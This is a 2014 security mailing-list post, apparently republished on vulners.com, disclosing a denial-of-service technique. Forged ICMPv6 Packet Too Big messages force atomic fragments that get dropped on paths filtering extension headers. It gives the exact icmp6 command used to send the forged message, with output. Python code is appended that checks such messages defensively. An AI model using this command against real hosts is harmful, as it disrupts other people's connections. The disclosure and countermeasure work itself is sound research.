Aug 24, 2014 - 12:00 a.m.

DoS attacks (ICMPv6-based) resulting from IPv6 EH drops

vulners.com

Folks,

Ten days ago or so we published this I-D:
<http://www.ietf.org/internet-drafts/draft-gont-v6ops-ipv6-ehs-in-real-world-00.txt>

Section 5.2 of the I-D discusses a possible attack vector based on a
combination of "forged" ICMPv6 PTB messages and IPv6 frag drops by
operators, along with proposed countermeasures – but let me offer a
more informal and practical explanation:

1) It is known that filtering of packets containing IPv6 Extension
Headers (including the Fragment Header) is widespread (see our I-D above)

2) Let us assume that Host A is communicating with Server B, and that
some node filters fragments between Host A and Server B.

3) An attacker sends a spoofed ICMPv6 PTB to server B, with a "Next Hop
MTU" < 1280, in the hopes of eliciting "atomic fragments" (see
<http://tools.ietf.org/rfc/rfc6946.txt>) from now on.

4) Now server B starts sending IPv6 atomic fragments… And since they
include a frag header (and in '2)' above we noted that frags are dropped
on that path), these packets get dropped (i.e., DoS).

"Demo" with the icmp6 tool
(<http://www.si6networks.com/tools/ipv6toolkit>) – (some addresses have
been changed (anonymized), but it is trivial to pick a victim server…)

("2001:db8:1:10:0:1991:8:25" is the server, and
"2001:5c0:1000:a::840" is my own address):

---- cut here ----
***** First of all, I telnet to port 80 of the server, and
everything works as expected ****

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25…
Connected to 2001:db8:1:10:0:1991:8:25.
Escape character is '^]'.
^CConnection closed by foreign host.

**** Now I send the forged ICMPv6 PTB ****

fgont@satellite:~$ sudo icmp6 --icmp6-packet-too-big -d 2001:db8:1:10:0:1991:8:25 --peer-addr 2001:5c0:1000:a::840 --mtu 1000 -o 80 -v
icmp6: Security assessment tool for attack vectors based on ICMPv6 error
messages

IPv6 Source Address: 2001:5c0:1000:a::840 (automatically selected)
IPv6 Destination Address: 2001:db8:1:10:0:1991:8:25
IPv6 Hop Limit: 227 (randomized)
ICMPv6 Packet Too Big (Type 2), Code 0
Next-Hop MTU: 1000
Payload Type: IPv6/TCP (default)
Source Address: 2001:db8:1:10:0:1991:8:25 (automatically-selected)
Destination Address: 2001:5c0:1000:a::840
Hop Limit: 237 (randomized)
Source Port: 80 Destination Port: 38189 (randomized)
SEQ Number: 734463213 (randomized) ACK Number: 866605720 (randomized)
Flags: A (default) Window: 18944 (randomized) URG Pointer: 0 (default)
Initial attack packet(s) sent successfully.

***** And now I try the same telnet command as above… but it fails,
because the frags from the server to me are getting dropped somewhere ****

fgont@satellite:~$ telnet 2001:db8:1:10:0:1991:8:25 80
Trying 2001:db8:1:10:0:1991:8:25…
[timeout]

---- cut here ----

Of course, in this particular case we just "shot ourselves". But one
could do this to DoS connections between mailservers, etc.

A nice question is: what if e.g…

1) some BGP servers accept ICMPv6 PTB that claim an MTU < 1280, and
react (as expected) by generating atomic fragments, and,

2) These same BGP servers deem fragmentation as "harmful", and hence
drop such fragments

you could essentially DoS traffic between them.


JOIN US at the next edition of our "Hacking IPv6 Networks" training
course in Leipzig, Germany: February 2-3, 2015.
More info available at:
<https://www.it-defense.de/en/it-defense-2015/trainings/hacking-ipv6-networks/>



Fernando Gont
SI6 Networks
e-mail: [email protected]
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492

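The receiving-host checks implied by step 3 above and by the icmp6 output in the demo, as an added example that is not part of the post and not the ipv6toolkit's code: it parses an ICMPv6 Packet Too Big message, flags a Next-Hop MTU below the IPv6 minimum of 1280 (which could only ever add a Fragment Header), and compares the quoted TCP 4-tuple and sequence number against a table of the host's own connections. The `connections` table shape and `build_sample_ptb` are assumptions; the sample message reuses the addresses, ports and SEQ shown in the post.

```python
import ipaddress
import struct

IPV6_MIN_MTU = 1280  # IPv6 minimum link MTU; a PTB advertising less can only elicit atomic fragments


def parse_ptb(icmp6: bytes) -> dict:
    """Parse an ICMPv6 Packet Too Big (type 2) message and the offending packet it quotes."""
    icmp_type, _code, _cksum, mtu = struct.unpack("!BBHI", icmp6[:8])
    if icmp_type != 2:
        raise ValueError("not an ICMPv6 Packet Too Big message")
    inner = icmp6[8:]  # quoted IPv6 packet: fixed 40-byte header, then the transport header
    if len(inner) < 40:
        raise ValueError("truncated quoted IPv6 header")
    info = {
        "mtu": mtu,
        "next_header": inner[6],
        "inner_src": str(ipaddress.IPv6Address(inner[8:24])),
        "inner_dst": str(ipaddress.IPv6Address(inner[24:40])),
    }
    if info["next_header"] == 6 and len(inner) >= 48:  # TCP: quoted ports and sequence number
        info["sport"], info["dport"], info["seq"] = struct.unpack("!HHI", inner[40:48])
    return info


def assess_ptb(icmp6: bytes, connections: dict) -> list:
    """Return the reasons a host should ignore this PTB; an empty list means it looks legitimate.

    `connections` (assumed shape) maps (local_addr, local_port, remote_addr, remote_port)
    to the host's current (snd_una, snd_nxt) send window for that connection.
    """
    info = parse_ptb(icmp6)
    reasons = []
    if info["mtu"] < IPV6_MIN_MTU:
        reasons.append(f"MTU {info['mtu']} below {IPV6_MIN_MTU}: would only add a Fragment Header")
    key = (info["inner_src"], info.get("sport"), info["inner_dst"], info.get("dport"))
    window = connections.get(key)
    if window is None:
        reasons.append("quoted packet matches no active connection")
    elif not (window[0] <= info.get("seq", -1) < window[1]):
        reasons.append("quoted sequence number outside the send window")
    return reasons


def build_sample_ptb(mtu: int) -> bytes:
    """Constructed PTB mirroring the post's icmp6 output: quoted packet from the server
    2001:db8:1:10:0:1991:8:25 port 80 to 2001:5c0:1000:a::840 port 38189, SEQ 734463213."""
    ip6 = struct.pack("!IHBB", 0x60000000, 20, 6, 237)  # version 6, payload 20, TCP, hop limit 237
    ip6 += ipaddress.IPv6Address("2001:db8:1:10:0:1991:8:25").packed
    ip6 += ipaddress.IPv6Address("2001:5c0:1000:a::840").packed
    tcp = struct.pack("!HHIIBBHHH", 80, 38189, 734463213, 866605720, 5 << 4, 0x10, 18944, 0, 0)
    return struct.pack("!BBHI", 2, 0, 0, mtu) + ip6 + tcp  # checksums left at zero (not verified here)
```

A stack that applies both checks ignores the demo's PTB on two counts; a PTB that quotes a live connection but still advertises 1000 is rejected on the MTU check alone.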